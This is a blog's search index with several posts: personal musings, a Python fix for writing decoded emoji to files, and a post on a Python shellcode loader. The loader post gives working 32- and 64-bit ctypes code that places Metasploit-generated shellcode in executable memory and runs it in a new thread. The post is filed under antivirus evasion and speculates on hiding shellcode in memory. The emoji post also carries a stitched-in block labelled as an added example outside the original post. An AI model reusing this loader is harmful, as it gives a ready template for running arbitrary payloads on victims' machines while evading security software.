search.xml (133 lines, 63 loc, 34.3 KB)
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>Taking stock</title>
<link href="/2022/04/11/%E5%AE%A1%E8%A7%86/"/>
<url>/2022/04/11/%E5%AE%A1%E8%A7%86/</url>
<content type="html"><![CDATA[<p>//This blog was meant for recording technical articles, but it came to carry a lot of idle talk and grumbling. Traces that cannot be cleaned up get a factory reset and a fresh start. abandon is still abandon; that will not change. –END</p>]]></content>
</entry>
<entry>
<title>The birth of abandon</title>
<link href="/2022/03/26/abandon%E7%9A%84%E8%AF%9E%E7%94%9F/"/>
<url>/2022/03/26/abandon%E7%9A%84%E8%AF%9E%E7%94%9F/</url>
<content type="html"><![CDATA[<p>2022/03/26</p><p>: Is your English any good?</p><p>Hahahaha<br>English is too hard</p><p>: Is there a word that fits "within reason, beyond expectation"?</p><p>abandon</p><p>Beyond expectation, isn't it<br>yet on reflection within reason</p><p>: Nice, that's the name then</p><p>Are you serious?</p><p>: Serious</p><p>I'm at a loss</p><p>: I think abandon is more interesting than any word that merely fits "within reason, beyond expectation"</p><p>It's the only word in my head</p><p>: Isn't that exactly the beyond-expectation part? A perfect fit.</p><hr><p>And so abandon0326 was born</p>]]></content>
<categories>
<category> Daily notes </category>
</categories>
</entry>
<entry>
<title>Random thoughts</title>
<link href="/2022/03/26/%E9%9A%8F%E8%B0%88/"/>
<url>/2022/03/26/%E9%9A%8F%E8%B0%88/</url>
<content type="html"><![CDATA[<p>Some time has passed, and the articles to show for it are pitifully few. It is not that there have been no new discoveries or ideas, but that the spur-of-the-moment enthusiasm and the settled state of mind I had at the start are gone.</p><p>The restlessness seems to come from what I take to be self-discipline, but I know that is still not enough (I am bragging). Sharing on social platforms no longer has the same flavour; perhaps it is growing older, gaining experience, or the environment that makes it feel uncomfortable. A blog, where I record what I see, think and learn, should be a better place for it: not hoping to be seen or discussed, only to capture the thought of that moment and the wonder of "fate".</p><p>Whenever a stretch of time has passed, I regret the most basic "saying" and "doing" of that period: handled imperfectly, mostly for want of forethought and under the pull of emotion. I am ever more convinced that emotion steers us more than the mind does, more even than I thought. Perhaps maturity simply means reason holding emotion down. But what makes people people, and what gives events so many twists, may also come down to that one word, "feeling".</p><p>Each period of self-reflection yields many ideas about myself, but an idea often lasts only a moment, and few people seem to act on theirs. Unity of knowledge and action is, I suppose, a demand I now make of myself (I do not think I can meet it). People say think more, think it through before acting, and there is reason in that, but just when thought and action are about to agree, more thinking can suppress the doing, and what follows is what I later call my own naivety. So everything has two sides: the good has a bad side and the bad a good side; the bad may not be the bad I imagine, and the good may not be the good I imagine. There is great truth in the idea of yin and yang. Things in films, videos and TV series that once seemed laughably far-fetched turn out, after you have lived through them, to have been portrayed rather mildly. Watching a film with the view that every moment has its meaning, one no longer gets restless or impatient. Only what has happened is fact; whether one's own thoughts before it happened were necessary or not is for oneself to decide.</p><p>At this age I still take the word maturity to mean extreme reason holding down one's natural emotions. Do not assume your own idea is how things will turn out; "here" there is far, far too much randomness.</p><p>Within reason, beyond expectation ~~~~~~~~~.</p>]]></content>
<categories>
<category> Daily notes </category>
</categories>
</entry>
<entry>
<title>python3: writing emoji characters to a text file</title>
<link href="/2021/12/07/python3-%E8%A1%A8%E6%83%85%E5%AD%97%E7%AC%A6%E5%86%99%E5%85%A5%E6%96%87%E6%9C%AC/"/>
<url>/2021/12/07/python3-%E8%A1%A8%E6%83%85%E5%AD%97%E7%AC%A6%E5%86%99%E5%85%A5%E6%96%87%E6%9C%AC/</url>
<content type="html"><![CDATA[<h3 id="python3爬虫遇到emoji-表情字符-或特殊字符时-无法将字符写入到文本文件。"><a href="#python3爬虫遇到emoji-表情字符-或特殊字符时-无法将字符写入到文本文件。" class="headerlink" title="python3 crawler: emoji or other special characters cannot be written to a text file"></a>python3 crawler: emoji or other special characters cannot be written to a text file</h3><p>The scraped string arrives in JavaScript escape() form: every UTF-16 code unit as %uXXXX (an emoji is a surrogate pair, so two of them) and ordinary URL-encoded bytes as %XX. Python 2:</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python"># Python 2
import urllib

dc = '%uD83C%uDF52%uD83C%uDF52%20%u5C0F%u6A31%u5B50'
# scraped string in %uXXXX form; the original text is "🍒🍒 小樱子"

dc = urllib.unquote(dc)           # %20 -> ' ' (replacing every '%' with '\' would turn %20 into the octal escape \20, i.e. chr(16))
dc = dc.replace("%u", "\\u")      # %uD83C -> \uD83C, touching only the %u escapes
dc = dc.decode("unicode_escape")  # unicode_escape: the encoding of a Unicode literal in ASCII Python source (quotes are not escaped); decodes from Latin-1. \uD83C\uDF52 become the emoji's surrogate pair

dc = dc.encode("utf-8")
with open("1.txt", 'a+') as f:
    f.write(dc)
</code></pre></td></tr></table></figure><hr><p>The same code breaks under Python 3: str is already text there, so it has no decode() method, and the bytes produced by encode() cannot be written to a file opened in text mode. The principle is simple; the details are a bit annoying.</p><hr><p>Python 3:</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">import urllib.parse

tmp = '%uD83C%uDF52%uD83C%uDF52%20%u5C0F%u6A31%u5B50'

tmp = urllib.parse.unquote(tmp)  # %20 -> ' '; %uXXXX is left alone because "uD" is not a hex byte
tmp = tmp.replace("%u", "\\u")   # %uD83C -> \uD83C
tmp = tmp.encode("raw_unicode_escape").decode("raw_unicode_escape")  # \uD83C -> the lone surrogate U+D83C (a Python 3 str may hold it)
tmp = tmp.encode('utf-16', 'surrogatepass').decode('utf-16', 'surrogatepass')  # the UTF-16 round trip joins high+low surrogates into one code point: 🍒
# (a further encode("raw_unicode_escape").decode("unicode_escape") is redundant here: the text is already correct)

with open("1.txt", 'a+', encoding="utf-16") as f:
    f.write(tmp)  # the original wrote an undefined name `a`
</code></pre></td></tr></table></figure><p>The crux is not only the escape conversion: the encoding the file is opened with matters just as much. Python 3's open() defaults to the locale encoding (GBK on a Chinese Windows install), which cannot represent emoji, so f.write() raises UnicodeEncodeError even when the string itself is correct. Pass encoding="utf-16" as above or, more usually, encoding="utf-8".</p>]]></content>
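<![CDATA[
The decoding above, generalised into one function, as an added example that is not part of the original post. It handles both escape kinds the scraped string mixes (%uXXXX UTF-16 code units and %XX bytes), pairs surrogates the same way as the post's UTF-16 round trip, and also covers the failure case the post does not: an unpaired surrogate, which Python 3 happily keeps in a str but which makes the UTF-8 write raise UnicodeEncodeError. The function names, the sample strings and the temporary-file round trip are constructed for this example.

```python
"""Added example: decode JavaScript escape()-style text (%uXXXX UTF-16 code
units mixed with %XX bytes) into a Python 3 str and write it out as UTF-8."""
import os
import re
import tempfile
import urllib.parse

_UNIT = re.compile(r"%u([0-9A-Fa-f]{4})")


def decode_js_escape(s: str, errors: str = "replace") -> str:
    """'%uD83C%uDF52%20%u5C0F' -> '🍒 小'.

    1. %XX bytes -> text (UTF-8) via urllib; %uXXXX is untouched because
       'uD' is not a hex byte, so urllib leaves the sequence as it is.
    2. each %uXXXX -> one UTF-16 code unit, possibly a lone surrogate.
    3. a UTF-16 round trip joins high+low surrogates into single code
       points; an unpaired surrogate is handled according to `errors`:
       'replace' -> U+FFFD, 'strict' -> UnicodeDecodeError,
       'surrogatepass' -> kept (and then not UTF-8 encodable).
    """
    s = urllib.parse.unquote(s)
    s = _UNIT.sub(lambda m: chr(int(m.group(1), 16)), s)
    return s.encode("utf-16-le", "surrogatepass").decode("utf-16-le", errors)


def has_unpaired_surrogate(s: str) -> bool:
    """True if `s` still holds a lone surrogate, i.e. cannot be written as UTF-8."""
    try:
        s.encode("utf-8")
    except UnicodeEncodeError:
        return True
    return False


def write_utf8(path: str, text: str) -> None:
    """Append one line as UTF-8. The locale default (GBK, cp1252, ...) would raise on emoji."""
    with open(path, "a", encoding="utf-8") as f:
        f.write(text + "\n")


def roundtrip_through_file(escaped: str) -> str:
    """Decode, write to a temporary file, read it back: the crawler pipeline end to end."""
    text = decode_js_escape(escaped)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "1.txt")
        write_utf8(path, text)
        with open(path, encoding="utf-8") as f:
            return f.read().rstrip("\n")


if __name__ == "__main__":
    # constructed sample in the same form as the scraped string in the post
    print(roundtrip_through_file("%uD83C%uDF52%uD83C%uDF52%20%u5C0F%u6A31%u5B50"))
```

With the default errors="replace" an unpaired surrogate becomes U+FFFD and the write always succeeds; pass errors="strict" to reject malformed input instead, which is the better choice when the text is later fed to something that expects well-formed Unicode.
]]>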
<categories>
<category> Programming </category>
</categories>
<tags>
<tag> python </tag>
</tags>
</entry>
<entry>
<title>python shellcode loader</title>
<link href="/2021/11/06/python-shellcode-loader/"/>
<url>/2021/11/06/python-shellcode-loader/</url>
<content type="html"><![CDATA[<h1 id="python-shellcode-loader"><a href="#python-shellcode-loader" class="headerlink" title="python shellcode loader"></a>python shellcode loader</h1><p>Sample code, 32-bit environment:</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">#!/usr/bin/python
# python 3.7.0 32bit
# Metasploit windows/x86/exec calc.exe, 32-bit payload

import ctypes  # loads DLLs and provides C data types

buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
buf += b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
buf += b"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
buf += b"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
buf += b"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
buf += b"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
buf += b"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
buf += b"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
buf += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

# convert the bytes payload into a mutable bytearray (ctypes will not pass a bytearray directly)
shellcode = bytearray(buf)

# VirtualAlloc: reserve and commit a block of memory for the shellcode
ptr = ctypes.windll.kernel32.VirtualAlloc(
    ctypes.c_int(0),               # lpAddress: NULL, let the system choose the address
    ctypes.c_int(len(shellcode)),  # dwSize: bytes to allocate
    ctypes.c_int(0x3000),          # flAllocationType: MEM_COMMIT (0x1000) | MEM_RESERVE (0x2000)
    ctypes.c_int(0x40))            # flProtect: PAGE_EXECUTE_READWRITE, readable, writable and executable

# RtlMoveMemory: copy the shellcode into the allocated block
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_int(ptr),             # Destination: the allocated block
    buf,                           # Source: the shellcode bytes
    ctypes.c_int(len(shellcode)))  # Length: number of bytes to copy

# CreateThread: start a new thread whose entry point is the first byte of the shellcode
ht = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),                  # lpThreadAttributes: default security
    ctypes.c_int(0),                  # dwStackSize: 0 = default stack size
    ctypes.c_int(ptr),                # lpStartAddress: the shellcode
    ctypes.c_int(0),                  # lpParameter: nothing passed to the thread
    ctypes.c_int(0),                  # dwCreationFlags: 0 = run immediately
    ctypes.pointer(ctypes.c_int(0)))  # lpThreadId: receives the new thread id

# WaitForSingleObject: block until the thread exits; -1 (INFINITE) waits forever
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
</code></pre></td></tr></table></figure><p>References:<br>XG小刚 <a href="https://mp.weixin.qq.com/s/-WcEW1aznO2IuCezkCe9HQ">https://mp.weixin.qq.com/s/-WcEW1aznO2IuCezkCe9HQ</a><br><a href="https://www.cnblogs.com/Akkuman/p/11851057.html">https://www.cnblogs.com/Akkuman/p/11851057.html</a><br>Thanks to both authors.</p><p>In short, shellcode is a blob of executable machine code written out as hex bytes. A loader allocates a region of memory that is readable, writable and executable, copies the shellcode into it, and starts execution at its first byte. Loaders in most languages are built on the C FFI (foreign function interface), and the principle is the same in all of them. That is how I see it with what I know so far.</p><hr><p>The main calls (any one of these steps can be replaced by another way of executing shellcode):</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">VirtualAlloc in kernel32.dll: allocate a readable, writable, executable region
ctypes.windll.kernel32.VirtualAlloc

RtlMoveMemory in kernel32.dll: copy the shellcode into that region
ctypes.windll.kernel32.RtlMoveMemory

CreateThread in kernel32.dll: create a new thread that executes the code in that region
ctypes.windll.kernel32.CreateThread

wait for the created thread to finish
ctypes.windll.kernel32.WaitForSingleObject
</code></pre></td></tr></table></figure><hr><p>For the shellcode argument, ctypes.c_char_p(buf) also works as RtlMoveMemory's source pointer, and the shellcode loads successfully with no type conversion at all, which puzzled me at first: RtlMoveMemory's source parameter should be a pointer to the memory to copy, yet the raw shellcode is just a bytes object of hex code with no explicit address, and the function prototype says nothing about it; the only explanation would be that the address is supplied automatically when the variable is passed in. That is exactly what happens: ctypes marshals a Python bytes argument as a char * pointing at the object's internal buffer (the same thing c_char_p wraps), and (ctypes.c_char * n).from_buffer(bytearray) builds a ctypes array that shares the bytearray's memory and is likewise passed as a pointer to it. All three forms hand RtlMoveMemory a valid source address. The conversion below is therefore only needed because a bytearray is not one of the types ctypes passes directly (bytes, str, int and None are); with a bytes payload it is redundant.</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">shellcode = bytearray(buf)
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
</code></pre></td></tr></table></figure><hr><p>The sample above must be run under 32-bit Python 3 with a 32-bit payload; otherwise it fails with an access violation writing to memory. The cause is that ctypes assumes a C int (32-bit) return type for every function unless told otherwise, so the 64-bit pointer VirtualAlloc returns is truncated before it reaches RtlMoveMemory. Declare the return type explicitly:<br>ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64<br>(ctypes.c_void_p does the same and is pointer-sized on both 32- and 64-bit, so it works in either environment.)</p><hr><p>Below is the 64-bit sample; the only differences are the payload and the pointer type (ctypes.c_uint64):</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">import ctypes

# 64-bit calc.exe payload
shellcode = b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
shellcode += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
shellcode += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
shellcode += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
shellcode += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
shellcode += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
shellcode += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
shellcode += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
shellcode += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
shellcode += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
shellcode += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
shellcode += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
shellcode += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
shellcode += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
shellcode += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
shellcode += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
shellcode += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
shellcode += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
shellcode += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
shellcode += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
shellcode += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"
shellcode += b"\x78\x65\x00"

shellcode = bytearray(shellcode)
# declare VirtualAlloc's return type as a 64-bit integer; the default C int would truncate the pointer
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# allocate RWX memory: MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

# copy in the shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# create a thread that starts executing at the first byte of the shellcode
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# wait for the thread created above to finish
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
</code></pre></td></tr></table></figure><hr><p>Personal thoughts:<br>For in-memory AV evasion, could I put the shellcode in one thread at n different addresses and execute them one after another in order? Unless the shellcode is merged it apparently cannot be executed from different addresses, though it seems possible to allocate another block inside the thread, put the n addresses into it and execute from there. Could that, leaving C2 signatures aside, achieve advanced in-memory evasion? Or is the aim just to have shellcode at different addresses execute in turn as a way of loading it. In theory it looks a bit unrealistic.</p>]]></content>
<categories>
<category> AV evasion </category>
</categories>
<tags>
<tag> python </tag>
<tag> shellcode </tag>
<tag> C2 </tag>
<tag> cobalt strike </tag>
</tags>
</entry>
<entry>
<title>Hello World</title>
<link href="/2021/11/03/hello-world/"/>
<url>/2021/11/03/hello-world/</url>
<content type="html"><![CDATA[<h1 id="Hello-World"><a href="#Hello-World" class="headerlink" title="Hello World"></a>Hello World</h1><p>Every "hello world" marks a beginning. I know the beginning, but not the end. This is a road that has only a beginning and no end. I do not know whether anyone has already found the finish line. May everyone find their own finish line, rather than the finish line of "hello world", and not leave this road before putting a full stop after "hello world".</p>]]></content>
<categories>
<category> Daily notes </category>
</categories>
</entry>
</search>